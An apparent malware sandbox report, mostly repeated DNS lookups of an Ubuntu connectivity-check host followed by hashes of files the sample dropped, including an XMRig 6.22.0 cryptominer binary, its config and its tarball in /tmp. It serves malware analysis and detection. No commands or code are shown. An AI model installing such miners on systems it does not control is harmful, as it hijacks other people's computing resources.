                                2620:2d:4000:1::98
                                2620:2d:4002:1::197
                                2001:67c:1562::24
                                2620:2d:4002:1::196
                                2620:2d:4002:1::198
                                2620:2d:4000:1::2b
                                2620:2d:4000:1::97
                                2620:2d:4000:1::2a

                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                 278 B
                                 1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response

                                185.125.190.49
                                185.125.190.97
                                185.125.190.96
                                91.189.91.96
                                91.189.91.48
                                185.125.190.98
                                91.189.91.97
                                185.125.190.17
                                91.189.91.49
                                185.125.190.48
                                185.125.190.18
                                91.189.91.98

                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                 422 B
                                 1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response

                                2620:2d:4002:1::197
                                2620:2d:4000:1::98
                                2620:2d:4002:1::196
                                2001:67c:1562::23
                                2620:2d:4000:1::96
                                2620:2d:4000:1::22
                                2620:2d:4000:1::23
                                2620:2d:4000:1::97
                                2620:2d:4002:1::198
                                2620:2d:4000:1::2b
                                2620:2d:4000:1::2a
                                2001:67c:1562::24

                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                 278 B
                                 1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response

                                185.125.190.97
                                185.125.190.48
                                185.125.190.49
                                185.125.190.96
                                91.189.91.49
                                91.189.91.48
                                185.125.190.98
                                185.125.190.18
                                91.189.91.96
                                91.189.91.98
                                185.125.190.17
                                91.189.91.97

                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                 422 B
                                 1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response

                                2620:2d:4002:1::196
                                2620:2d:4000:1::96
                                2620:2d:4002:1::198
                                2620:2d:4000:1::2a
                                2620:2d:4000:1::22
                                2620:2d:4000:1::98
                                2001:67c:1562::23
                                2620:2d:4000:1::97
                                2620:2d:4000:1::2b
                                2620:2d:4002:1::197
                                2620:2d:4000:1::23
                                2001:67c:1562::24

                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                344 B
                                 278 B
                                 4
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response

                                91.189.91.96
                                185.125.190.97
                                185.125.190.96
                                91.189.91.98
                                185.125.190.18
                                91.189.91.48
                                185.125.190.98
                                185.125.190.48
                                91.189.91.97
                                185.125.190.49
                                185.125.190.17
                                91.189.91.49

                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                 422 B
                                 1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response

                                2001:67c:1562::24
                                2620:2d:4000:1::98
                                2620:2d:4000:1::97
                                2620:2d:4002:1::196
                                2620:2d:4000:1::2b
                                2620:2d:4000:1::23
                                2620:2d:4002:1::198
                                2001:67c:1562::23
                                2620:2d:4000:1::96
                                2620:2d:4002:1::197
                                2620:2d:4000:1::2a
                                2620:2d:4000:1::22

                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                172 B
                                 278 B
                                 2
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response

                                185.125.190.97
                                91.189.91.97
                                91.189.91.96
                                91.189.91.49
                                91.189.91.48
                                185.125.190.17
                                185.125.190.96
                                185.125.190.18
                                91.189.91.98
                                185.125.190.48
                                185.125.190.98
                                185.125.190.49

                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                258 B
                                 422 B
                                 3
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response

                                2620:2d:4002:1::196
                                2620:2d:4000:1::97
                                2620:2d:4000:1::2b
                                2001:67c:1562::24
                                2620:2d:4002:1::198
                                2620:2d:4000:1::98
                                2620:2d:4000:1::96
                                2620:2d:4000:1::23
                                2620:2d:4000:1::2a
                                2620:2d:4002:1::197
                                2620:2d:4000:1::22
                                2001:67c:1562::23

                              • 1.1.1.1:53
                                connectivity-check.ubuntu.com
                                dns
                                86 B
                                 278 B
                                 1
                                1

                                DNS Request

                                connectivity-check.ubuntu.com

                                DNS Response

                                185.125.190.48
                                185.125.190.17
                                185.125.190.97
                                91.189.91.48
                                185.125.190.49
                                91.189.91.98
                                91.189.91.97
                                185.125.190.98
                                185.125.190.96
                                91.189.91.49
                                185.125.190.18
                                91.189.91.96

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • /root/.wget-hsts
                                Filesize

                                215B

                                MD5

                                64dd8ac8db44b59dc79cf829a26da4ae

                                SHA1

                                9067d279506901dedab418197bcc3242c220a54d

                                SHA256

                                8a8ba4e594888a51410bdfdb1701ffbceeb1416ce0e711f5e775678ce028e53a

                                SHA512

                                3b84653e8130c81a34ba7061d9801c11726932bfd08abb35e01f2b3be1d21c8384bbb379e867733f85672a11dd2614dfafcbbcf4e8f8bad0eedefec4e9f3f8bb

                                Download Submit

                              • /tmp/clearsigned.message.8A9lOg
                                Filesize

                                257KB

                                MD5

                                f7baae962e2417343c0d68864dea6b69

                                SHA1

                                014599a6b6aff7497bc72d0f6ae30f7aa6383c1a

                                SHA256

                                52486e27d87061aa66607e1c03ab199be5658c67d4f166c20793ded09859bd6f

                                SHA512

                                fc0fca14d6752a81dfb433846e08ece181a51f72210126d935b6dde959aba36a04f5a92c2a0c2927c47e646807438f588b3f04f616ea34a10204baf54541bf23

                                Download Submit

                              • /tmp/xmrig-6.22.0/SHA256SUMS
                                Filesize

                                150B

                                MD5

                                19f1bb08cf8997837b1f738b76ca97e9

                                SHA1

                                c497499ad539d6ef580c6c932a2633fe820abded

                                SHA256

                                99ca11102d0994a98a76722b325f3215b30d3b3df3d722a2baebf6f9944566fa

                                SHA512

                                fbb742f0fa67720e798b493a5e5ba5e72cbdde3c0ea55cfc0704f93ab97c586434a3e029f6e1e3ed655da997649aa8e9caf352018b87457755f75ca1bfe50230

                                Download Submit

                              • /tmp/xmrig-6.22.0/config.json
                                Filesize

                                1KB

                                MD5

                                1879742a3f028a8e227f3b6b51756269

                                SHA1

                                20365c0cf35e787f525baede3646cfdfe6001cba

                                SHA256

                                4042908287a7c60eb515d2c180a03d25156b4001af6cba1ad823461cc86751c5

                                SHA512

                                e7d918532dd029a53b803df0df2e4e61416e18b58ffabe18b542cd30b111f266e98d73aad8ffe62a79af50e4f21d7e19415ee03ff104eb36aaad2cf1903e9731

                                Download Submit

                              • /tmp/xmrig-6.22.0/config.json
                                Filesize

                                919B

                                MD5

                                0a9b0011891eae4086d16c3364e772ff

                                SHA1

                                98fe8a7b5b6b0c0aa7635e4e388c67c863772b69

                                SHA256

                                1aa77bd6697d36e345cd7c0769613e9798106b0fed206d7f766e846b63aa10fd

                                SHA512

                                9e1791e92d71b539aac8f944a3db65708ebfca102f16e3e7af429aaea1446be781c4ec5cb740a163dbc11a3bdacfed36d21262e05fcf29d896beb06ce0d59554

                                Download Submit

                              • /tmp/xmrig-6.22.0/xmrig
                                Filesize

                                5.0MB

                                MD5

                                5da7e5b69532a31fcda3dfce36b83b55

                                SHA1

                                6ce87d5beff8d1a50a141671e35401a5b9bd3fdb

                                SHA256

                                6167bb33e19130878b1e3f6c092e6c94cd389856b1d137cb9066f0cea351930e

                                SHA512

                                efd069b8adfdec4f7adb0364cf8dc9a506ee1a5179e2f76b94210f6ca11562d21b7304ea6dbf1ae8f89114061c698093b3a887b844121e32fd3f4ccd33e6adab

                                Download Submit

                              • /tmp/xmrigtar.tar.gz
                                Filesize

                                3.4MB

                                MD5

                                ccdb2d76041e107dff38f962d65b3d4b

                                SHA1

                                e9360c43398f3725b0a3eb87e2448ac416d96be3

                                SHA256

                                11d52ee20c865f6b0b7787bfe7a06d7ce0d865e041552365b9a026a0d24cc18f

                                SHA512

                                f6b090c698cb1092bf10010bbe00fed0388e7117b8397cf3113a23271bb514d0d03b559de721896994b472f26f9e3aeeddc2877d71bcc7830313e97d2171033d

                                Download Submit

                              We care about your privacy.

                              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.